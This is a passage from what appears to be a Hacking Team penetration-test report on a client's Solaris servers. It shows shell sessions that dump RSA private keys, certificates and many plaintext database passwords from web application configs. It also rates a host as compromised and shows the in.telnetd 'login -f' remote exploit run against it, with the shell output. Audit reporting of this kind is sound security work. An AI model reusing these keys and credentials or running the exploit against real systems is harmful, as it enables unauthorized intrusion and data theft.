ADANBgkqhkiG9w0BAQQFAAOBgQAJb5VBwPt5sxoTU/q5Tspe7h4DksmaipfPhDKt
vVSdXKvMj7t17adJptNvfTmp8TcUTkRfc6Rj/+gwh7Fc52toSnWz7fPdTfsPXPMg
vb+SUj10gme7iDfv6r2E87H1DuWifGFreZEWnk5BWur66znf6WZGbcmJtf0fUxS0
hmKLBQ==
-----END CERTIFICATE REQUEST-----
bash-3.00# cat mtssysmon01.key
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,AC3C07ECBF42F81E
rt4yHz+gfYzRCoNNSg7xOJ2Eg4w+DX3ekmsiNMdWTr618B7B9C3ImLft8IKmBOm5
UlKq7YvZnnKj7Oyv5xeYohPzNfN9EwR9cYAZvCMwrASNK7Z1GsF5M+8b41EHJIqn
kk5/UIRIwGpkNkgYhpNKNTfb/rMBKvsYmVg9FxFJ47YTeyQpT/CNMKeSlalg8d1A
pLg3rOIXMQJucuY2cbWal9MJn/GF24GyLjTURgaVsCuNh0KshxhdZ0SVXDrU32Nw
rhELoXqH0ImqYEuaOZJZrH9dRe2gr45Fh30JgKxq8pA2F/j0gyyKPhscZs31nJ0E
JfsR0SuX2poFW3dtuuzXGb4WYfYYJ2ABbMJw+CIYr/4UiEvD2Xv9zle+82ytY1iZ
HuSaU8hNL3G/9H3TF1nOHmaE6IddeSnD6CTE3oRrFfsE5QDIG2bEOv402f7b0vq9
OzAfhhh/BZMcPwHs77cqBG4dtKXMO0N8UEExFtL6Z6S9dEGXS/7c6+BHaLVsXx3F
gwcHM5oSDMtvsPEF9BFMQdRcXSgkVSKfzr83g6vd6+aBWAxajrhIGw8dvW672SZq
Iqev1xuGLmAaCHAcYqX3w4bt+lijRTiQOY+4oLtBWSFoKAtlZIxr/644YgWjooxQ
KQ8VNE+E4AT2bivkVmcwO2OoDsFN55QDPMCmLI1rAdTLAo/Bc6HZUaJwEKG7+j0w
yn82RRIyoWeeFTbzDZs9rwKgbm3rF2iuduG82uccq9R06IdIrYEtxPrgdLbMNmxu
s03ya9DtDUuxo6p0wx/mVazQtmuzGAUK82NtjbcqTyE=
-----END RSA PRIVATE KEY-----
bash-3.00# cat mtssysmon01.pem
-----BEGIN RSA PRIVATE KEY-----
MIICWwIBAAKBgQCjrbQeqiSuNTKEtVCK1IzhBy7Tqq0c4v6Ipi5DzSlxOfrDEgER
WZ2zTylOmxJvzt+sXFQ0Qr3f7boF01j1RLxRRl9BZtS/uhGOMMdwwxJkA3hRGyev
Z+1fO5kJD1L+vEAjL18qNBs5Sv+eeSlOdWKJsWh5j3i7UcyB5byE1Xw25QIDAQAB
AoGAHgUZ6BXkrF7taRGoOA5L2Gns2L2RCp9Hd+Ci06SpWS79IxIGSBxbpCt8tAIV
G5ShyYcVmpAzKwL6/16IDlQRBbvmtMsFgHdLOjwQKKY65pncZJOPeQfdDa2s27TU
ciUZHErzVBBOWtnhiot+YaawHHx4ISRrqNV8pZdgdZGAzoECQQDXdWuwLVwJMLbo
/NMFfpR+auosCxhx/0T6CEDaS3WrasJrSPjE3TAYiN546/QKPMYZMuEvivcY0824
L5DOavutAkEAwnoMijhlYLhB3rMWk4Cf93xawK5suErX1X0om5i5Kn3xKfvOBiZe
5QQ+ZyGOcptYfyZllsZhobmujgdaYsSPGQJAGTFaoSP8ofp3OLDvP7I4TLvVm8bE
Wff+KbozUxMFtEBscTz8EZDHYecHFF6Kj3PhueqQGA4IrHd/k2zEYs5xlQJADGFQ
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 187 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
owvsCDgymUa1TTaG+G5GKLXx3dmF2+VXzG/webACxjVtbB7NM68Nees88jbJb262
UN7YID99yTTWoCr7IQJAFlh5Gm0qRKIh8CaH9xv87MUQmbaMdiXEV8/HmTOKml3i
goOaCe/iz6ydB5cDwaP88bRWSEmtsn08I/KgkLN1yw==
-----END RSA PRIVATE KEY-----
bash-3.00# cat server.crt
-----BEGIN CERTIFICATE-----
MIICqTCCAhICCQCLznTMSrTpMzANBgkqhkiG9w0BAQQFADCBmDELMAkGA1UEBhMC
SVQxDzANBgNVBAgTBk1pbGFubzEPMA0GA1UEBxMGTWlsYW5vMRMwEQYDVQQKEwpN
VFMgUy5wLkEuMQswCQYDVQQLEwJJVDEhMB8GA1UEAxMYbXRzc3lzbW9uMDEubXRz
Z3JvdXAub3JnMSIwIAYJKoZIhvcNAQkBFhNzeXNtb25AbXRzZ3JvdXAub3JnMB4X
DTA1MDUwMjE0NTMxMVoXDTE1MDQzMDE0NTMxMVowgZgxCzAJBgNVBAYTAklUMQ8w
DQYDVQQIEwZNaWxhbm8xDzANBgNVBAcTBk1pbGFubzETMBEGA1UEChMKTVRTIFMu
cC5BLjELMAkGA1UECxMCSVQxITAfBgNVBAMTGG10c3N5c21vbjAxLm10c2dyb3Vw
Lm9yZzEiMCAGCSqGSIb3DQEJARYTc3lzbW9uQG10c2dyb3VwLm9yZzCBnzANBgkq
hkiG9w0BAQEFAAOBjQAwgYkCgYEAzPmq1TOW+tKM4zbgDvsplTcT9AAH+CZ72AcR
1YQNAZGGhsyclvUZZpkt1DyNM9FeBnyY8ZMKlg44sdN4ZslbZc1b+TiG3qSprvew
gjNUTSxwWhXWWiw+d8fYMJgHmypnZmsq1MOqbSlIjn4yzwcz8OvG2nw9rPAlbghV
SA11MQ8CAwEAATANBgkqhkiG9w0BAQQFAAOBgQDLfOpqHf20VaUDL0Gl/60gaM4a
WlnHqjVi05OCxXRTWNZe2ilkD/G66wl0EBJuhiZIL43qYh+IfjYJAIrH0zfbAU/g
//moTMQVPBvmWfPd3lwWjWoy8v8eePEt+rdYqrmjt3rVgKZX4XEpyqGjIMXJOlyW
2pFXYCAHyu18GX5RBQ==
-----END CERTIFICATE-----
bash-3.00# cat server.csr
-----BEGIN CERTIFICATE REQUEST-----
MIIB2TCCAUICAQAwgZgxCzAJBgNVBAYTAklUMQ8wDQYDVQQIEwZNaWxhbm8xDzAN
BgNVBAcTBk1pbGFubzETMBEGA1UEChMKTVRTIFMucC5BLjELMAkGA1UECxMCSVQx
ITAfBgNVBAMTGG10c3N5c21vbjAxLm10c2dyb3VwLm9yZzEiMCAGCSqGSIb3DQEJ
ARYTc3lzbW9uQG10c2dyb3VwLm9yZzCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkC
gYEAzPmq1TOW+tKM4zbgDvsplTcT9AAH+CZ72AcR1YQNAZGGhsyclvUZZpkt1DyN
M9FeBnyY8ZMKlg44sdN4ZslbZc1b+TiG3qSprvewgjNUTSxwWhXWWiw+d8fYMJgH
mypnZmsq1MOqbSlIjn4yzwcz8OvG2nw9rPAlbghVSA11MQ8CAwEAAaAAMA0GCSqG
SIb3DQEBBAUAA4GBAKYDXc8OaNb/KsdP7lMqe4LyY9Jbltyfe1waYNnJove+kItd
JPh/aSzxhUSM20UjQJhAbKLYe6p1PXXFuGSglt94Y/FE7WTlg0ONfqaUH5ZzNcSX
GUeGGPhl8hjsw04EadDF8T1tK/GkbE5ZaSC5tpLdg/Vox7fxk7pL4/3UMgpa
-----END CERTIFICATE REQUEST-----
bash-3.00# cat server.key
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,9FF595B0E3388573
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 188 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
4nMSdT6vkpSBug+W3ImRk2RZ9HbWBrCZ7gKpBb9brV2KCwmsxvSBTs7dudqwbrO6
3Fcu/VdXQXEdxKoknfSvaZmp9dacs48ZrcJod6OxhhzoK/8DGjU0GghX6ys35PSu
O8PEib6/PLaSvW9/pjv18DunjzPv6Be5ahD9XEsYEy6zYqDx4EnmkYMRTMyRPOjy
nhEKQJCLoMisI4V0fC7nfdbqIp/aiHd0q3k9uI0xAhuRaAildrRCltuyHobpuQpH
eridepqnq7ofjU+WZW5T+MMPFxnPMDwbj2SOex9wd7fFGMDMCZ/Fg5JlTviRIaF/
ISbAm9xAezfiUHeI53eFtQ9BalsbifAGlG1Qw8WY5eoseiMQcRFYg5uUngo/K3Ro
XMMfqgqww1oJSHvXk28Oxrfsr0BXloMqtcgTx+LiF32sRC9+dCcjFWeeNJTARcKn
P9Bxhisea0/9wWy3D4FqWEVsFHJ75FoXuKOebNJ9FoTB7Zpkz4QQeC5YFH0EABSL
XLIbPIa3TuuVQCwvlNJe3qO3uExF7jLqEa9JPLPDlvTLZjf5TjNwvb7NZllZg+P9
uFsXK7WcufuN1SbWi/Zgwu6hHmEd16rRmgES/383AEvsum5deKXk4kzYuQPHpf51
tTD4JjyFFOLE3Uq7S9hcR4LllYCxK3TN0ybh5COfs9BxSnJtwXnydNhjvrUYwmZK
ub/LIWaOYm1AGGOwIiUDIE9OHFna+Z/yED0QnqwYNPxV03sN5LHCpUPWbEExofHT
i/ZjxBc6LNDlpNaOG5oO9igwIFzO3p0TEEQp1JuZ8Hhjoin2anzMSA==
-----END RSA PRIVATE KEY-----
bash-3.00# cat server.pem
-----BEGIN RSA PRIVATE KEY-----
MIICXAIBAAKBgQDM+arVM5b60ozjNuAO+ymVNxP0AAf4JnvYBxHVhA0BkYaGzJyW
9RlmmS3UPI0z0V4GfJjxkwqWDjix03hmyVtlzVv5OIbepKmu97CCM1RNLHBaFdZa
LD53x9gwmAebKmdmayrUw6ptKUiOfjLPBzPw68bafD2s8CVuCFVIDXUxDwIDAQAB
AoGAZPtPVU/gPtvB+yKKyfak6tVCqD/nrTJQawI4oAc5XR9zti9RqfFAPVKTyG64
ZeHsv6dctg7p9Tk2Zy02sPTcaG0uwPSFzo/ySuyQXg/04PZKFE3SyG8b+uQ9S2Pa
egbLQXo0HdhfJ78puNUxqRTh8/hkeMPI7Ycwpn6NEtr0JEkCQQD83vPJnYFRvyWf
h6p3TL5cz29i9iMTWXv1iMGDKE7ysOC1duNxPB6304k9qp9C2O2GxkbXDwXrvmYb
/QMpPM5tAkEAz4L9luILpn7nIuYdvG8ybiR/+gdr6ZRa1ObMoBi+U/orX1AeGbk1
rcKxIpq87bpqMJjDN27ZomBPTCcpi2af6wJBAKQWjP20jjkcn25g25Ykn5acKLx/
2gzxUUXoIyJX4rsLWhWG+1n8WDaTNwhkEoqPN7rwKQHexsnOOHZK/WUiBxUCQBvF
mTDPUeXXiBGYoJQugZ5SDjqlMaESNNHXjb1Dcn2EtrdL3qtsqS13KAPMl8ptL3cP
itjpYgEkSJiViS7Z7j8CQEV2uLjtOGtCVzbeT5mm0yKtMlK+sipMBIcVqXidCB/W
PztSaJBFgl/mRJ88v7b6VnxrTOEPiPhTm/OzoaokpaM=
-----END RSA PRIVATE KEY-----
bash-3.00# pwd
/export/home/luca/certs
100.100.200.70 - - [XXXX] "GET /phpMyAdmin/left.php?lang=en-iso-8859-
1&server=1&hash=5699709640549571e537c3637396e4ff1113986001 HTTP/1.1" 200 1950
100.100.200.70 - - [XXXX] "GET /phpMyAdmin/queryframe.php?lang=en-iso-8859-
1&server=1&hash=5699709640549571e537c3637396e4ff1113986001 HTTP/1.1" 200
bash-3.00# less local.cshrc
#ident "@(#)local.cshrc 1.2 00/05/01 SMI"
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 189 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
umask 022
set path=(/bin /usr/bin /usr/ucb /etc .)
if ( $?prompt ) then
set history=32
endif
bash-3.00# less local.login
#
# Copyright (c) 2001 by Sun Microsystems, Inc.
# All rights reserved.
#
# ident "@(#)local.login 1.7 01/06/23 SMI"
stty -istrip
# setenv TERM `tset -Q -`
bash-3.00# pwd
/export/home/luca
bash-3.00# ls pass/
mtsit.c mtssysmon01.c
bash-3.00# cat pass/mtsit.c
[REMOVED]
bash-3.00# cat pass/mtssysmon01.c
[REMOVED]
bash-3.00# ls
apache2 create_mirrors ftptest1 local.login packages
scripts
certs ftptest local.cshrc local.profile pass
software
bash-3.00# cat MTSIndexFileChecker.pl
[REMOVED]
bash-3.00# cat MTSIndexFileChecker.pl.config
[..]
#Mail message configuration
TSIndexFileChecker.mail.smptp.server = smtp.inet.it
MTSIndexFileChecker.mail.error.sender = TEST FTP Checker <[email protected]>
#MTSIndexFileChecker.mail.error.recipients = [email protected]
MTSIndexFileChecker.mail.error.recipients = [email protected]
MTSIndexFileChecker.mail.error.subject = TEST: Problem detected on FTP Server
MTSIndexFileChecker.mail.notify.subject = TEST: Notification from FTP Server
bash-3.00# cat FTPCheckerWatchdog
[REMOVED]
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 190 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
bash-3.00# ls
whospaging.d
bash-3.00# pwd
/export/home/root/scripts/dtrace
bash-3.00#
phpmyadmin
$cfg['PmaAbsoluteUri'] = 'https://mtssysmon01/pma';
$cfg['blowfish_secret'] = '';
$cfg['Servers'][$i]['auth_type'] = 'config'; // Authentication method
(config, http or cookie based)?
$cfg['Servers'][$i]['user'] = 'root'; // MySQL user
$cfg['Servers'][$i]['password'] = 'mtssql'; // MySQL password
(only needed
// with 'config' auth_type)
wiki
$wgDBserver = "localhost";
$wgDBname = "wikidb";
$wgDBuser = "wikimts";
$wgDBpassword = "mtssql";
$wgDBprefix = "mtsgroup_";
$wgProxyKey =
"ec2f2e4ecee7cb847a5257fdca4eecc1a89931515f4d1a24f9214ed26b43348e";
zabbix
// $DB_TYPE ="POSTGRESQL";
$DB_TYPE ="MYSQL";
$DB_SERVER ="localhost";
$DB_DATABASE ="zabbix";
$DB_USER ="zabbix";
$DB_PASSWORD ="zbxdb";
useradmin/config.inc.php
<?php
$db_host = "localhost";
$db_user = "http";
$db_pass = "chivala";
$db_name = "http-auth";© 2007 Hacking Team
All rights reservedNumber of attachments: 0 Page 191 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
?>
bash-3.00# pwd
/export/home/webadmin/timesheet
bash-3.00# cat database_credentials.inc
<?php
$DATABASE_HOST = "localhost";
$DATABASE_USER = "timesheet";
$DATABASE_PASS = "oM2nN1Eb";
$DATABASE_DB = "timesheet";
$DATABASE_PASSWORD_FUNCTION = "PASSWORD";
?>
/export/home/webadmin/nagiossql
bash-3.00# cat config/settings.ini | head -n 50
[REMOVED]
[db]
; MySQL server settings
server = localhost
database = db_nagiosql
username = nagiosqlusr
password = mtssql
; do not change this!
addslashes = 1
[nagios]
; Nagios main configuration directory
config = "/usr/local/nagios/etc/"
cacti
/* make sure these values refect your actual database/host/user/password */
$database_type = "mysql";
$database_default = "cacti";
$database_hostname = "localhost";
$database_username = "cactiuser";
$database_password = "somepassword";
// MySQL Database Connection Configuration
$sitedb_config['host'] = 'localhost'; // Address to
the database server
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 192 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
$sitedb_config['username'] = 'fruity'; // Username to
access the database
$sitedb_config['password'] = 'fruity'; // Password to
access the database
$sitedb_config['database'] = 'fruity'; // The database
name
$sitedb_config['dbserv'] = 'mysql'; // The database
driver (for now, use mysql)
bash-3.00# cat config.inc.php
<?php
$config['template'] = 'default.tpl.htm';
$config['limit'] = '50';
$config['database_type'] = 'mysql';
$config['database_host'] = 'localhost';
$config['database_table'] = 'bandersnatch';
$config['database_user'] = 'bandersnatch';
$config['database_password'] = 'LogThemAll';
$config['local_server'] = "im.mtsgroup.org";
$config['local_domains'] = array
(
'mtsgroup.org'
);
#################### End of user-configurable options #######################
$config['app_version'] = '0.2';
$config['app_name'] = 'Bandersnatch PHP Frontend';
bash-3.00# pwd
/export/home/webadmin/bandersnatch/includes
bash-3.00# less pgp.key
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: GnuPG v1.2.1 (SunOS)
mQGiBD3qohgRBAC4L+hRl6MmKwCFDyzKOXoEedB5DWieIb+Pov1XZXnflSKJquZW
SKn8WLzmaVMx7ap65lxatwQ/WzoHy0lRBL5UbZwlufX8Zp0MbDMQ9LV8cpJOpSay
JQxzs/KeYI3CVgvKHNexOGmj25L5uXM4iSD5DELaQC/vHctsL5An+neq6wCglzkS
WbllT3w81iRl4tBUl32NMh8D/287jIPFYvTsRY/srHcbI5NGYPf067IYgB3yvf4d
qaQKUDq8N5+OTm/dTi11dW1XC1Cwj1HMBcMXjA5hvUOdoNWb7mgs2lNpmPcwnyT5
cOlXUzmz8MoAyZiwyqvXwkR1SeX46ExGQ30Qk7BB9czTvBgdhGOQT6QGO9GD5L1B
8K94A/4nKyDLGNEqoFdKGe4sq+GEm5sSjdd8gy0+ZVj/d3IO/bZhactjYYBVddDQ
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 193 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
7xv0yre/slPZ/U0sntGPd3iAw6kFEi0GPe7eIDDqAZrtyZGKUh9ecquGdAZ4psHN
rb1FsiIKLIdMb8PFYJ9gem5EULAhShsJBJd5mJWK6NlHNuPc3LQnRGlzdHJpYnV0
aW9uIE1hbmFnZXIgPGRtQGJsYXN0d2F2ZS5vcmc+iFkEExECABkFAj3qohgECwcD
AgMVAgMDFgIBAh4BAheAAAoJEAah7RvhLp0vnkMAoITzYpchxXMyT8umhZEWreh1
OxfeAJ9Mqv3D+AeeTcYQvo3XpBIDLnA9WIhGBBARAgAGBQI96t6AAAoJEApOj0IT
OtZqk44AnR1f3ylrkqc4ksqxSrYUzFKg4T/aAKC03HXXxcU5VjO1PAEijPUdeV6U
2Q==
=RSdH
-----END PGP PUBLIC KEY BLOCK-----
</pre>
bash-3.00# pwd
/root
bash-3.00# ps -ef
UID PID PPID C STIME TTY TIME CMD
root 0 0 0 Oct 28 ? 1:37 sched
root 1 0 1 Oct 28 ? 363:40 /sbin/init
root 2 0 0 Oct 28 ? 0:01 pageout
root 3 0 1 Oct 28 ? 966:43 fsflush
root 22226 113 0 Nov 17 console 0:00 /usr/lib/saf/ttymon -g -d
/dev/console -l console -T sun-color -m ldterm,ttcomp
root 114 1 0 Oct 28 ? 45:51 /usr/sbin/nscd
root 9 1 0 Oct 28 ? 2:43 /lib/svc/bin/svc.configd
root 599 1 0 Oct 28 ? 0:00 /bin/sh
/usr/local/mysql/bin/mysqld_Safe --datadir=/usr/local/mysql/var --pid-f
root 454 1 0 Oct 28 ? 115:04 usr/lib/pool/poold
root 193 1 0 Oct 28 ? 0:00 /usr/lib/sysevent/syseventd
root 315 1 0 Oct 28 ? 0:18 /usr/lib/utmpd
root 300 113 0 Oct 28 ? 0:03 /usr/lib/saf/sac -t 300
root 279 1 0 Oct 28 ? 1:06 /usr/sbin/cron
root 113 1 0 Oct 28 ? 9:56 /lib/svc/bin/svc.startd
root 301 1 0 Oct 28 ? 2:31 /usr/lib/inet/inetd start
smmsp 421 1 0 Oct 28 ? 0:14 /usr/lib/sendmail -Ac -q15m
daemon 289 1 0 Oct 28 ? 0:00 /usr/lib/nfs/statd
daemon 291 1 0 Oct 28 ? 0:00 /usr/lib/nfs/lockd
daemon 280 1 0 Oct 28 ? 0:00 /usr/sbin/rpcbind
daemon 160 1 0 Oct 28 ? 932:20 /usr/lib/crypto/kcfd
root 143 1 0 Oct 28 ? 0:00 /usr/lib/picl/picld
daemon 287 1 0 Oct 28 ? 10:04 /usr/lib/nfs/nfsmapid
daemon 286 1 0 Oct 28 ? 0:00 /usr/lib/nfs/nfs4cbd
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 194 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
root 321 300 0 Oct 28 ? 0:03 /usr/lib/saf/ttymon
root 172 1 0 Oct 28 ? 0:00 /usr/lib/power/powerd
root 414 1 0 Oct 28 ? 0:27 /usr/lib/ssh/sshd
root 386 1 0 Oct 28 ? 0:24 /usr/lib/autofs/automountd
root 429 301 0 Oct 28 ? 0:00 /usr/sbin/rpc.metad
root 427 1 0 Oct 28 ? 5:12 /usr/lib/sendmail -bd -q15m
root 410 1 0 Oct 28 ? 0:00 /usr/sbin/mdmonitord
root 407 1 0 Oct 28 ? 0:31 /usr/sbin/syslogd
root 439 1 0 Oct 28 ? 0:00 /usr/lib/fm/fmd/fmd
root 549 1 0 Oct 28 ? 0:00 /usr/lib/dmi/snmpXdmid -s
mtssysmon01
root 523 1 0 Oct 28 ? 0:02 /usr/lib/snmp/snmpdx -y -c
/etc/snmp/conf
root 522 1 0 Oct 28 ? 0:00 /usr/dt/bin/dtlogin -daemon
root 543 1 0 Oct 28 ? 0:00 /usr/lib/dmi/dmispd
root 564 1 0 Oct 28 ? 0:07 /usr/sbin/vold
mysql 626 599 0 Oct 28 ? 534:21
/usr/local/mysql/libexec/mysqld --basedir=/usr/local/mysql --datadir=/usr/local
root 594 1 0 Oct 28 ? 4:37 /usr/sfw/sbin/snmpd
webadmin 10678 1 1 19:55:01 ? 0:00 /usr/local/php5/bin/php -q
/export/home/webadmin/graphs/cmd.php 0 55
root 26629 301 0 18:44:24 ? 0:00 /usr/sbin/in.telnetd
root 747 301 0 Oct 28 ? 0:00 /usr/dt/bin/rpc.ttdbserverd
root 22339 22338 0 - ? 0:00 <defunct>
root 4484 1 0 Feb 13 ? 0:00 sh -c /usr/local/bin/perl
-Iblib/lib -Iblib/arch -I/usr/local/lib/perl5/5.8.7/i
webadmin 8794 8778 0 Jul 05 ? 0:07 /usr/local/apache2/bin/httpd
-k start -DSSL
root 22298 522 0 Nov 17 ? 105:55 /usr/X11/bin/Xorg :0 -depth
24 -nobanner -auth /var/dt/A:0-4Haqbb
root 16361 1 0 Nov 10 ? 13:24 /usr/lib/inet/xntpd
webadmin 8782 8778 0 Jul 05 ? 0:07 /usr/local/apache2/bin/httpd
-k start -DSSL
webadmin 8780 8778 0 Jul 05 ? 0:07 /usr/local/apache2/bin/httpd
-k start -DSSL
webadmin 10680 10679 0 19:55:01 ? 0:00 /usr/local/rrdtool-
1.0.49/bin/rrdtool -
webadmin 10681 10678 0 19:55:01 ? 0:00 sh -c /usr/local/php5/bin/php
/export/home/webadmin/graphs/script_server.php cm
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 195 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
webadmin 10682 10681 0 19:55:01 ? 0:00 /usr/local/php5/bin/php
/export/home/webadmin/graphs/script_server.php cmd
webadmin 10676 10675 1 19:55:01 ? 0:00 /usr/local/php5/bin/php
/export/home/webadmin/graphs/poller.php
webadmin 10675 279 0 19:55:01 ? 0:00 sh -c /usr/local/php5/bin/php
/export/home/webadmin/graphs/poller.php > /dev/nu
nagios 6969 1 1 Jul 13 ? 10:51 /opt/nagios/bin/nagios -d
/opt/nagios/etc/nagios.cfg
webadmin 8795 8778 0 Jul 05 ? 0:08 /usr/local/apache2/bin/httpd
-k start -DSSL
webadmin 11971 11970 0 19:55:22 ? 0:00 /usr/local/bin/snmpget -O
fntev -c mtspublic -v 2c -t 1 -r 3 mtsdfeed2:161 .1.3
webadmin 10679 10676 0 19:55:01 ? 0:00 sh -c /usr/local/rrdtool-
1.0.49/bin/rrdtool -
root 11972 26636 0 19:55:22 pts/3 0:00 ps -ef
root 4649 1 0 Jul 14 ? 2:25 /usr/j2se/bin/java -Dviper
.fifo.path=/var/run/smc898/boot.fifo -Xmx128m -Djava.
webadmin 8783 8778 0 Jul 05 ? 0:07 /usr/local/apache2/bin/httpd
-k start -DSSL
root 4636 301 0 Jul 14 ? 0:00 /usr/sbin/rpc.metamedd
root 22323 522 0 Nov 17 ?? 0:02 /usr/openwin/bin/fbconsole -d
:0
root 14453 1 0 May 08 ? 0:00 /usr/bin/ssh-agent
nobody 4629 301 0 Jul 14 ? 0:00 /usr/openwin/bin/xfs
root 22338 22322 0 Nov 17 ? 50:50 dtgreet -display :0
root 4639 301 0 Jul 14 ? 0:00 /usr/sbin/rpc.metamhd
root 4485 4484 0 Feb 13 ? 0:00 /usr/local/bin/perl -Iblib
/lib -Iblib/arch -I/usr/local/lib/perl5/5.8.7/i86pc-s
root 22322 522 0 Nov 17 ? 0:00 /usr/dt/bin/dtlogin -daemon
webadmin 11970 10678 0 19:55:22 ? 0:00 sh -c /usr/local/bin/snmpget
-O fntev -c 'mtspublic' -v 2c -t 1 -r 3 mtsdfeed2:
webadmin 8784 8778 0 Jul 05 ? 0:07 /usr/local/apache2/bin/httpd
-k start -DSSL
root 9435 1 0 Nov 13 ? 0:48 /usr/lib/gconfd-2 11
root 8779 8778 0 Jul 05 ? 0:00
/usr/local/apache2/bin/rotatelogs /usr/local/apache2/logs/mtssysmon01_access_lo
webadmin 8781 8778 0 Jul 05 ? 0:07 /usr/local/apache2/bin/httpd
-k start -DSSL
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 196 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
nagios 10790 1 1 May 09 ? 384:08 /usr/local/nagios/bin/nagios
-d /usr/local/nagios/etc/nagios.cfg
root 5678 1 0 Feb 21 ? 128:21 /usr/bin/java -server
-Dinstall4j.jvmDir=/usr -Dinstall4j.appDir=/opt/wildfire-
root 8778 1 0 Jul 05 ? 0:25 /usr/local/apache2/bin/httpd
-k start -DSSL
root 26632 26629 0 18:44:24 pts/3 0:00 -sh
root 26636 26632 0 18:44:24 pts/3 0:01 /usr/bin/bash
6.6.3 100.100.200.14 [Compromised]
Rating: compromised
Vulnerabilities found: V5, V6
Risk state: High
Skill level required to exploit the vulnerability: Low
Solution: Install all OS updates; disable finger service; replace ftp with ftps, telnet with telnets or ssh
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Server
Vendor/OS Sun Solaris Version SunOS 5.10 Generic_118833-22
sun4u sparc SUNW,Ultra-80
Hostname MILITSUNSRV1 MTSIT
Compromised Compromised Directly Info Telnet calling login -f
Auth -froot
The host was alive and these additional information could be extracted:
21/tcp open ftp ProFTPD 1.3.0
22/tcp open ssh SunSSH 1.1 (protocol 2.0)
23/tcp open telnet BSD-derived telnetd
25/tcp open smtp Sendmail 8.13.7+Sun/8.13.7
79/tcp open finger Sun Solaris fingerd
80/tcp open http Apache httpd 2.2.4 ((Unix))
111/tcp open rpcbind 2-4 (rpc #100000)
513/tcp open rlogin
514/tcp open tcpwrapped
587/tcp open smtp Sendmail 8.13.7+Sun/8.13.7
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 197 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
898/tcp open http Sun Solaris Management Console (Runs Tomcat
webserver)
4045/tcp open nlockmgr 1-4 (rpc #100021)
7100/tcp open font-service Sun Solaris fs.auto
32771/tcp open status 1 (rpc #100024)
32772/tcp open metad 1-2 (rpc #100229)
32773/tcp open mdcommd 1 (rpc #100422)
32774/tcp open rpc.metamedd 1 (rpc #100242)
32775/tcp open metamhd 1 (rpc #100230)
32776/tcp open rusersd 2-3 (rpc #100002)
32777/tcp open rpc
Telnetd and ftpd are cleartext and insecure services, consider disabling them or at least replacing
them with their cryptographic counterparts.
The fingerd service is prone to Information Disclosure.
The host has an outdated Solaris version, the supplied telnetd server calls login with unescaped
arguments allowing a remote user to login with any user, root included, without supplying a valid
password:
$ sh scan 100.100.200.14 root
SunOS 5.10/5.11 in.telnetd Remote Exploit by Kingcope [email protected]
Trying 100.100.200.14...
Connected to 100.100.200.14.
Escape character is '^]'.
Not on system console
Connection closed by foreign host.
$ sh scan 100.100.200.14 bin
SunOS 5.10/5.11 in.telnetd Remote Exploit by Kingcope [email protected]
Trying 100.100.200.14...
Connected to 100.100.200.14.
Escape character is '^]'.
Sun Microsystems Inc. SunOS 5.10 Generic January 2005
$ uname -a
SunOS militsunsrv1 5.10 Generic_118833-22 sun4u sparc SUNW,Ultra-80
$ id
uid=2(bin) gid=2(bin)
bash-3.00$ ps -ef
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 198 of 460
